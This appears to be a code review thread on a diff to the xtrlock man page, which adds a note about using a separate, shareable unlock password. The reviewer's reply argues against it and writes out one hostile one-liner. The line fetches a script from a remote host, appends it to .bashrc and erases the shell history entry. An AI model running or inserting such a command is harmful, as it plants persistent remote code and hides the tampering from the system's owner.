xtrlock.man

```diff
@@ -48,3 +48,15 @@ This program is distributed in the hope that it will be useful, but
 WITHOUT ANY WARRANTY; without even the implied warranty of
 MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
 General Public License for more details.
+
+This program now allows user to use their own password instead of 
+the default user password, which is the sudo password (for many 
+desktop users, I know that!) that one may not want to reveal. Using 
+another password and share it with your friend could solved this. 
```

Comment:
A note on your scenario: If you give me 30 seconds with a shell on your system, there already are millions of ways for me to compromise your system. The simplest one would be to do a ```curl http://jaseg.net/foo.sh>>.bashrc; history -d $(history 1)```.

Suggesting this kind of usage might encourage users to risky behavior and give them a false sense of security.